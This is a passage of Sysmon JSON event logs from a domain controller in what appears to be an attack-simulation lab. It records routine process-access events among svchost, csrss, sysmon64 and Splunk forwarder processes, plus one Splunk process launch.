05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5889,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.285\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.285","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5890,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.927\r\nProcessGuid: {A837DB8D-03AA-5F25-0000-0010D0F60A00}\r\nProcessId: 3484\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.927","ProcessGuid":"{A837DB8D-03AA-5F25-0000-0010D0F60A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5891,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03AA-5F25-0000-0010D0F60A00}\r\nTargetProcessId: 3484\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03AA-5F25-0000-0010D0F60A00}","TargetProcessId":"3484","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5892,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03AA-5F25-0000-0010D0F60A00}\r\nTargetProcessId: 3484\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03AA-5F25-0000-0010D0F60A00}","TargetProcessId":"3484","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5893,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5894,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5895,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5896,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5897,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 